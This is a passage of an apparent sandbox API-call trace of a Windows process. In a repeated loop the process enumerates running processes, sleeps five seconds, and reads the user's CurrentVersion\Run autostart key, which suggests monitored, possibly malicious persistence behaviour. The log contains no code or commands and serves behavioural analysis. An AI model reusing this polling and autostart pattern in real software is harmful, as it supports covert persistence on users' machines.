BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1020000, RegionSize=0xdea68*=0x10000) returned 0x0 [0180.891] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1020000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1020000, ResultLength=0x0) returned 0xc0000004 [0180.893] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1020000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0180.893] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1020000, RegionSize=0xdea54*=0x20000) returned 0x0 [0180.894] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1020000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1020000, ResultLength=0x0) returned 0x0 [0180.899] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1020000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0180.900] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0180.901] NtCreateKey (in: KeyHandle=0xdea74, DesiredAccess=0x20219, ObjectAttributes=0xde1e4*(Length=0x18, RootDirectory=0x0, ObjectName="\\Registry\\User\\S-1-5-21-1560258661-3990802383-1811730007-1000\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), TitleIndex=0x0, Class=0x0, CreateOptions=0x0, Disposition=0x0 | out: KeyHandle=0xdea74*=0x274) returned 0x0 [0180.903] NtEnumerateValueKey (in: KeyHandle=0x274, Index=0x0, KeyValueInformationClass=0x1, KeyValueInformation=0xde438, Length=0x200, ResultLength=0xde838 | out: KeyValueInformation=0xde438, ResultLength=0xde838) returned 0x0 [0180.903] NtClose (Handle=0x274) returned 0x0 [0180.903] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1020000, RegionSize=0xdea68*=0x10000) returned 0x0 [0180.903] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1020000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1020000, ResultLength=0x0) returned 0xc0000004 [0180.906] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1020000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0180.906] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1020000, RegionSize=0xdea54*=0x20000) returned 0x0 [0180.906] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1020000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1020000, ResultLength=0x0) returned 0x0 [0180.914] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1020000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0180.914] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0180.918] NtCreateKey (in: KeyHandle=0xdea74, DesiredAccess=0x20219, ObjectAttributes=0xde1e4*(Length=0x18, RootDirectory=0x0, ObjectName="\\Registry\\User\\S-1-5-21-1560258661-3990802383-1811730007-1000\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), TitleIndex=0x0, Class=0x0, CreateOptions=0x0, Disposition=0x0 | out: KeyHandle=0xdea74*=0x274) returned 0x0 [0180.918] NtEnumerateValueKey (in: KeyHandle=0x274, Index=0x0, KeyValueInformationClass=0x1, KeyValueInformation=0xde438, Length=0x200, ResultLength=0xde838 | out: KeyValueInformation=0xde438, ResultLength=0xde838) returned 0x0 [0180.918] NtClose (Handle=0x274) returned 0x0 [0180.918] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1020000, RegionSize=0xdea68*=0x10000) returned 0x0 [0180.919] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1020000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1020000, ResultLength=0x0) returned 0xc0000004 [0180.922] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1020000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0180.923] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1020000, RegionSize=0xdea54*=0x20000) returned 0x0 [0180.923] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1020000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1020000, ResultLength=0x0) returned 0x0 [0180.929] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1020000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0180.930] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0180.932] NtCreateKey (in: KeyHandle=0xdea74, DesiredAccess=0x20219, ObjectAttributes=0xde1e4*(Length=0x18, RootDirectory=0x0, ObjectName="\\Registry\\User\\S-1-5-21-1560258661-3990802383-1811730007-1000\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), TitleIndex=0x0, Class=0x0, CreateOptions=0x0, Disposition=0x0 | out: KeyHandle=0xdea74*=0x274) returned 0x0 [0180.933] NtEnumerateValueKey (in: KeyHandle=0x274, Index=0x0, KeyValueInformationClass=0x1, KeyValueInformation=0xde438, Length=0x200, ResultLength=0xde838 | out: KeyValueInformation=0xde438, ResultLength=0xde838) returned 0x0 [0180.933] NtClose (Handle=0x274) returned 0x0 [0180.933] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1020000, RegionSize=0xdea68*=0x10000) returned 0x0 [0180.934] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1020000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1020000, ResultLength=0x0) returned 0xc0000004 [0180.936] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1020000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0180.937] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1020000, RegionSize=0xdea54*=0x20000) returned 0x0 [0180.937] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1020000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1020000, ResultLength=0x0) returned 0x0 [0180.942] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1020000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0180.943] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0180.945] NtCreateKey (in: KeyHandle=0xdea74, DesiredAccess=0x20219, ObjectAttributes=0xde1e4*(Length=0x18, RootDirectory=0x0, ObjectName="\\Registry\\User\\S-1-5-21-1560258661-3990802383-1811730007-1000\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), TitleIndex=0x0, Class=0x0, CreateOptions=0x0, Disposition=0x0 | out: KeyHandle=0xdea74*=0x274) returned 0x0 [0180.946] NtEnumerateValueKey (in: KeyHandle=0x274, Index=0x0, KeyValueInformationClass=0x1, KeyValueInformation=0xde438, Length=0x200, ResultLength=0xde838 | out: KeyValueInformation=0xde438, ResultLength=0xde838) returned 0x0 [0180.946] NtClose (Handle=0x274) returned 0x0 [0180.946] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1020000, RegionSize=0xdea68*=0x10000) returned 0x0 [0180.947] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1020000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1020000, ResultLength=0x0) returned 0xc0000004 [0180.949] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1020000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0180.950] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1020000, RegionSize=0xdea54*=0x20000) returned 0x0 [0180.950] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1020000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1020000, ResultLength=0x0) returned 0x0 [0180.956] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1020000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0180.956] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0180.958] NtCreateKey (in: KeyHandle=0xdea74, DesiredAccess=0x20219, ObjectAttributes=0xde1e4*(Length=0x18, RootDirectory=0x0, ObjectName="\\Registry\\User\\S-1-5-21-1560258661-3990802383-1811730007-1000\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), TitleIndex=0x0, Class=0x0, CreateOptions=0x0, Disposition=0x0 | out: KeyHandle=0xdea74*=0x274) returned 0x0 [0180.959] NtEnumerateValueKey (in: KeyHandle=0x274, Index=0x0, KeyValueInformationClass=0x1, KeyValueInformation=0xde438, Length=0x200, ResultLength=0xde838 | out: KeyValueInformation=0xde438, ResultLength=0xde838) returned 0x0 [0180.959] NtClose (Handle=0x274) returned 0x0 [0180.959] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1020000, RegionSize=0xdea68*=0x10000) returned 0x0 [0180.959] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1020000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1020000, ResultLength=0x0) returned 0xc0000004 [0180.963] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1020000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0180.963] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1020000, RegionSize=0xdea54*=0x20000) returned 0x0 [0180.963] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1020000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1020000, ResultLength=0x0) returned 0x0 [0180.970] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1020000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0180.971] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0180.975] NtCreateKey (in: KeyHandle=0xdea74, DesiredAccess=0x20219, ObjectAttributes=0xde1e4*(Length=0x18, RootDirectory=0x0, ObjectName="\\Registry\\User\\S-1-5-21-1560258661-3990802383-1811730007-1000\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), TitleIndex=0x0, Class=0x0, CreateOptions=0x0, Disposition=0x0 | out: KeyHandle=0xdea74*=0x274) returned 0x0 [0180.977] NtEnumerateValueKey (in: KeyHandle=0x274, Index=0x0, KeyValueInformationClass=0x1, KeyValueInformation=0xde438, Length=0x200, ResultLength=0xde838 | out: KeyValueInformation=0xde438, ResultLength=0xde838) returned 0x0 [0180.977] NtClose (Handle=0x274) returned 0x0 [0180.977] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1020000, RegionSize=0xdea68*=0x10000) returned 0x0 [0180.978] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1020000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1020000, ResultLength=0x0) returned 0xc0000004 [0180.980] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1020000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0180.981] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1020000, RegionSize=0xdea54*=0x20000) returned 0x0 [0180.981] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1020000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1020000, ResultLength=0x0) returned 0x0 [0180.986] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1020000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0180.987] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0180.988] NtCreateKey (in: KeyHandle=0xdea74, DesiredAccess=0x20219, ObjectAttributes=0xde1e4*(Length=0x18, RootDirectory=0x0, ObjectName="\\Registry\\User\\S-1-5-21-1560258661-3990802383-1811730007-1000\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), TitleIndex=0x0, Class=0x0, CreateOptions=0x0, Disposition=0x0 | out: KeyHandle=0xdea74*=0x274) returned 0x0 [0180.989] NtEnumerateValueKey (in: KeyHandle=0x274, Index=0x0, KeyValueInformationClass=0x1, KeyValueInformation=0xde438, Length=0x200, ResultLength=0xde838 | out: KeyValueInformation=0xde438, ResultLength=0xde838) returned 0x0 [0180.989] NtClose (Handle=0x274) returned 0x0 [0180.990] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1020000, RegionSize=0xdea68*=0x10000) returned 0x0 [0180.990] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1020000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1020000, ResultLength=0x0) returned 0xc0000004 [0180.992] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1020000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0180.993] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1020000, RegionSize=0xdea54*=0x20000) returned 0x0 [0180.993] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1020000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1020000, ResultLength=0x0) returned 0x0 [0180.999] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1020000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0181.000] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0181.002] NtCreateKey (in: KeyHandle=0xdea74, DesiredAccess=0x20219, ObjectAttributes=0xde1e4*(Length=0x18, RootDirectory=0x0, ObjectName="\\Registry\\User\\S-1-5-21-1560258661-3990802383-1811730007-1000\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), TitleIndex=0x0, Class=0x0, CreateOptions=0x0, Disposition=0x0 | out: KeyHandle=0xdea74*=0x274) returned 0x0 [0181.002] NtEnumerateValueKey (in: KeyHandle=0x274, Index=0x0, KeyValueInformationClass=0x1, KeyValueInformation=0xde438, Length=0x200, ResultLength=0xde838 | out: KeyValueInformation=0xde438, ResultLength=0xde838) returned 0x0 [0181.002] NtClose (Handle=0x274) returned 0x0 [0181.002] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1020000, RegionSize=0xdea68*=0x10000) returned 0x0 [0181.003] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1020000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1020000, ResultLength=0x0) returned 0xc0000004 [0181.006] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1020000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0181.006] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1020000, RegionSize=0xdea54*=0x20000) returned 0x0 [0181.006] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1020000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1020000, ResultLength=0x0) returned 0x0 [0181.014] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1020000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0181.015] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0181.018] NtCreateKey (in: KeyHandle=0xdea74, DesiredAccess=0x20219, ObjectAttributes=0xde1e4*(Length=0x18, RootDirectory=0x0, ObjectName="\\Registry\\User\\S-1-5-21-1560258661-3990802383-1811730007-1000\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), TitleIndex=0x0, Class=0x0, CreateOptions=0x0, Disposition=0x0 | out: KeyHandle=0xdea74*=0x274) returned 0x0 [0181.019] NtEnumerateValueKey (in: KeyHandle=0x274, Index=0x0, KeyValueInformationClass=0x1, KeyValueInformation=0xde438, Length=0x200, ResultLength=0xde838 | out: KeyValueInformation=0xde438, ResultLength=0xde838) returned 0x0 [0181.019] NtClose (Handle=0x274) returned 0x0 [0181.019] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1020000, RegionSize=0xdea68*=0x10000) returned 0x0 [0181.020] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1020000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1020000, ResultLength=0x0) returned 0xc0000004 [0181.022] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1020000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0181.022] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1020000, RegionSize=0xdea54*=0x20000) returned 0x0 [0181.023] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1020000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1020000, ResultLength=0x0) returned 0x0 [0181.029] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1020000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0181.030] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0181.031] NtCreateKey (in: KeyHandle=0xdea74, DesiredAccess=0x20219, ObjectAttributes=0xde1e4*(Length=0x18, RootDirectory=0x0, ObjectName="\\Registry\\User\\S-1-5-21-1560258661-3990802383-1811730007-1000\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), TitleIndex=0x0, Class=0x0, CreateOptions=0x0, Disposition=0x0 | out: KeyHandle=0xdea74*=0x274) returned 0x0 [0181.032] NtEnumerateValueKey (in: KeyHandle=0x274, Index=0x0, KeyValueInformationClass=0x1, KeyValueInformation=0xde438, Length=0x200, ResultLength=0xde838 | out: KeyValueInformation=0xde438, ResultLength=0xde838) returned 0x0 [0181.032] NtClose (Handle=0x274) returned 0x0 [0181.032] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1020000, RegionSize=0xdea68*=0x10000) returned 0x0 [0181.033] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1020000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1020000, ResultLength=0x0) returned 0xc0000004 [0181.035] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1020000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0181.036] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1020000, RegionSize=0xdea54*=0x20000) returned 0x0 [0181.036] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1020000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1020000, ResultLength=0x0) returned 0x0 [0181.043] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1020000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0181.044] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0181.045] NtCreateKey (in: KeyHandle=0xdea74, DesiredAccess=0x20219, ObjectAttributes=0xde1e4*(Length=0x18, RootDirectory=0x0, ObjectName="\\Registry\\User\\S-1-5-21-1560258661-3990802383-1811730007-1000\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), TitleIndex=0x0, Class=0x0, CreateOptions=0x0, Disposition=0x0 | out: KeyHandle=0xdea74*=0x274) returned 0x0 [0181.046] NtEnumerateValueKey (in: KeyHandle=0x274, Index=0x0, KeyValueInformationClass=0x1, KeyValueInformation=0xde438, Length=0x200, ResultLength=0xde838 | out: KeyValueInformation=0xde438, ResultLength=0xde838) returned 0x0 [0181.046] NtClose (Handle=0x274) returned 0x0 [0181.046] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1020000, RegionSize=0xdea68*=0x10000) returned 0x0 [0181.046] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1020000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1020000, ResultLength=0x0) returned 0xc0000004 [0181.050] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1020000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0181.050] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1020000, RegionSize=0xdea54*=0x20000) returned 0x0 [0181.050] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1020000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1020000, ResultLength=0x0) returned 0x0 [0181.057] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1020000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0181.058] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0181.059] NtCreateKey (in: KeyHandle=0xdea74, DesiredAccess=0x20219, ObjectAttributes=0xde1e4*(Length=0x18, RootDirectory=0x0, ObjectName="\\Registry\\User\\S-1-5-21-1560258661-3990802383-1811730007-1000\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), TitleIndex=0x0, Class=0x0, CreateOptions=0x0, Disposition=0x0 | out: KeyHandle=0xdea74*=0x274) returned 0x0 [0181.061] NtEnumerateValueKey (in: KeyHandle=0x274, Index=0x0, KeyValueInformationClass=0x1, KeyValueInformation=0xde438, Length=0x200, ResultLength=0xde838 | out: KeyValueInformation=0xde438, ResultLength=0xde838) returned 0x0 [0181.061] NtClose (Handle=0x274) returned 0x0 [0181.061] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1020000, RegionSize=0xdea68*=0x10000) returned 0x0 [0181.061] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1020000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1020000, ResultLength=0x0) returned 0xc0000004 [0181.064] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1020000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0181.065] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1020000, RegionSize=0xdea54*=0x20000) returned 0x0 [0181.065] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1020000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1020000, ResultLength=0x0) returned 0x0 [0181.070] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1020000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0181.071] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0181.073] NtCreateKey (in: KeyHandle=0xdea74, DesiredAccess=0x20219, ObjectAttributes=0xde1e4*(Length=0x18, RootDirectory=0x0, ObjectName="\\Registry\\User\\S-1-5-21-1560258661-3990802383-1811730007-1000\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), TitleIndex=0x0, Class=0x0, CreateOptions=0x0, Disposition=0x0 | out: KeyHandle=0xdea74*=0x274) returned 0x0 [0181.074] NtEnumerateValueKey (in: KeyHandle=0x274, Index=0x0, KeyValueInformationClass=0x1, KeyValueInformation=0xde438, Length=0x200, ResultLength=0xde838 | out: KeyValueInformation=0xde438, ResultLength=0xde838) returned 0x0 [0181.074] NtClose (Handle=0x274) returned 0x0 [0181.074] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1020000, RegionSize=0xdea68*=0x10000) returned 0x0 [0181.075] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1020000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1020000, ResultLength=0x0) returned 0xc0000004 [0181.077] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1020000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0181.078] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1020000, RegionSize=0xdea54*=0x20000) returned 0x0 